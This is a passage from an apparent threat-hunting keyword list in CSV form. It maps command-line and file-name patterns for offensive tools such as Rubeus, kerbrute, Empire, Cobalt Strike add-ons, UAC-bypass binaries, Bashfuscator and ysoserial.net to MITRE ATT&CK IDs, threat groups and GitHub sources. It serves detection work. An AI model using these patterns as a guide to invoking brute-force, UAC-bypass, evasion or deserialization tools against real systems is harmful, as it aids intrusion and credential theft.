Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -* BofRunner(*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,0,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -* -bootkey *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* Brc4LdapSentinelParser*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -* broadcast-ataoe-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-avahi-dos.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-bjnp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-db2-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-dhcp6-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-dhcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-dns-service-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-dropbox-listener.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-eigrp-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-hid-discoveryd.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-igmp-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-jenkins-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-listener.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-ms-sql-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-netbios-master-browser.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-networker-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-novell-locate.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-ospf2-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-pc-anywhere.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-pc-duo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-pim-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-ping.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-pppoe-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-rip-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-ripng-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-sonicwall-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-sybase-asa-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-tellstick-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-upnp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-versant-locate.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-wake-on-lan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-wpad-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-wsdd-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-xdmcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* bropper.py*,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,0,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -* brute * /password*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* BruteForce(*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,0,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -* --brute-ratel*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -* Brutesploit*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,0,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -* bruteuser *,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -* build Dent.go*,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,0,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -* -Build -NoAttackPaths*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,0,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -* build_letmeout*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,0,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -* BypassFramework.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -* BypassUac*.bat*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* BypassUac*.dll*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* BypassUac*.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* -c * --choose-mutators * -s 1*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Bashfuscator/Bashfuscator,1,0,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -* -c * -o payload.ser*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -* -c *ExploitClass.cs*System.dll*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -c *OBFUSCATION=*.ps1*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 